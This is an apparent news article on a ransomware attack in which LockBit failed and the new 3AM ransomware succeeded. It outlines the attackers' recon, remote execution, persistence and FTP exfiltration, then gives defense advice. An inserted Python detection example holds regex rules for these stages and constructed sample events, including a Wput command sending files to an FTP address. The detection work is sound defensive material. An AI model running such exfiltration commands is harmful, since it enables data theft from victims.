
Failing LockBit Ransomware Gives Birth to the ‘3AM’ Attack: A New Menace on the Rise


In a Recent Attack, Hackers Deploy 3AM Ransomware After Failing to Execute LockBit

The Attack

In a recent attack against a construction company, hackers attempted to deploy LockBit ransomware but were unsuccessful. However, they were able to break through using a second ransomware called 3AM, which had never been seen before. Researchers from Symantec reported that this attack involved a double-whammy ransomware strategy, in which LockBit was blocked, but 3AM managed to infect one compromised machine. This incident serves as a reminder to organizations that attackers may use multiple ransomware families in their attempts to breach networks.

Unique Characteristics of 3AM Ransomware

3AM ransomware sets itself apart with an unusual theme. It encrypts files, appends the suffix “.threeamtime” to their names, and references the time of day in its ransom note. The note begins with the words, “Hello, ‘3 am’, The time of mysticism, isn’t it?”

The malware is a 64-bit executable written in Rust, a popular coding language for hackers and cybersecurity professionals. Its primary objective is to encrypt files, delete backup copies, and deploy the ransom note. It also attempts to terminate various security and backup-related software on the infected machine.

The Attack Process

The attackers started by infiltrating the target network and gathering user information. They used tools such as Cobalt Strike and PsExec to escalate privileges and execute reconnaissance commands like whoami and netstat. Additionally, they searched for other servers for lateral movement and created a new user for persistence. Once they had all the necessary information, they utilized the Wput utility to upload the victim’s files to their FTP server.

LockBit’s Failed Deployment

The attackers originally intended to deploy LockBit as their primary ransomware. However, the target’s cybersecurity protections successfully blocked its execution. This highlights the importance of implementing effective cybersecurity measures to counter known threats.

The Success of 3AM

Although LockBit failed, the attackers were prepared with an alternative weapon: 3AM ransomware. In this attack, the hackers managed to infect three machines with 3AM, but were only successful in fully compromising one. According to Dick O’Brien, Principal Intelligence Analyst for the Symantec Threat Hunter Team, the success of 3AM was likely due to its status as a previously unseen threat.

The Importance of Defense in Depth

As this attack demonstrates, organizations need to adopt a multi-layered approach to cybersecurity known as “defense in depth.” It is vital to address all stages of a potential attack and not merely focus on blocking specific types of malware. O’Brien advises that organizations should implement robust cybersecurity measures to detect and prevent all stages of an attack as early as possible. This approach minimizes the risk of successful infiltration and limits damage to the network.
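To make "detect every stage" concrete, the following added example (not from Symantec's report or the original article) maps the behaviours named under The Attack Process to stages and flags a host once two pre-encryption stages co-occur. The host names, command-line shapes, the FTP address and the threshold of two are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Stage rules use only behaviours the article names. The exact command-line
# shapes (for example "net user <name> ... /add") are assumptions.
STAGE_RULES = [
    ("recon",       re.compile(r"\b(whoami|netstat)(\.exe)?\b", re.I)),
    ("remote_exec", re.compile(r"\bpsexec(64)?(\.exe)?\b", re.I)),
    ("persistence", re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+.*\s/add\b", re.I)),
    ("exfil",       re.compile(r"\bwput(\.exe)?\b.*\bftp://", re.I)),
    ("impact",      re.compile(r"\.threeamtime\b", re.I)),
]
PRE_IMPACT = {"recon", "remote_exec", "persistence", "exfil"}

def stages_by_host(events):
    """Map each host to the set of attack stages seen in its events."""
    seen = defaultdict(set)
    for host, detail in events:
        for stage, pattern in STAGE_RULES:
            if pattern.search(detail):
                seen[host].add(stage)
    return dict(seen)

def triage(events, threshold=2):
    """'encrypting' if the .threeamtime suffix appears on a host;
    'investigate' if at least `threshold` pre-impact stages co-occur."""
    verdicts = {}
    for host, stages in stages_by_host(events).items():
        if "impact" in stages:
            verdicts[host] = "encrypting"
        elif len(stages & PRE_IMPACT) >= threshold:
            verdicts[host] = "investigate"
    return verdicts

# Constructed (host, process or file event) pairs, not real telemetry.
SAMPLE_EVENTS = [
    ("WS-014", r"C:\Windows\System32\whoami.exe /all"),
    ("WS-014", r"net user helpdesk2 <redacted> /add"),
    ("FS-02",  r"PsExec64.exe \\FS-02 cmd.exe"),
    ("FS-02",  r"wput.exe D:\projects ftp://203.0.113.10/in/"),
    ("FS-03",  r"rename D:\plans\site.dwg -> D:\plans\site.dwg.threeamtime"),
    ("WS-020", r"C:\Windows\System32\NETSTAT.EXE -rn"),  # lone admin command
]

if __name__ == "__main__":
    for host, verdict in sorted(triage(SAMPLE_EVENTS).items()):
        print(host, verdict)
```

A single recon command on WS-020 stays below the threshold, while the hosts showing two stages are raised before any file carries the “.threeamtime” suffix.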

Stopping Ransomware

Ransomware attacks are complex operations with multiple stages. Taking a comprehensive approach to cybersecurity helps organizations detect and block these attacks early on. By incorporating proactive measures such as intrusion detection systems, endpoint protection, and secure backup solutions, organizations can significantly reduce their vulnerability to ransomware attacks.

Additionally, regular employee training on recognizing phishing attempts and maintaining strong password hygiene can minimize the risk of successful network infiltration. It is also crucial to keep security software and operating systems patched and up to date to mitigate any potential vulnerabilities.

Ultimately, the earlier an attack is stopped, the better chance an organization has of avoiding significant damage and financial loss. Cybersecurity should be a top priority for businesses of all sizes as the threat landscape continues to evolve.

Conclusion

The recent attack involving the deployment of 3AM ransomware serves as a reminder that hackers are continually adapting their tactics to breach network defenses. Defending against ransomware requires a multi-pronged approach that encompasses robust cybersecurity measures, employee training, and regular software updates and patches. Organizations should remain proactive in their security posture to stay ahead of the constantly evolving threat landscape.
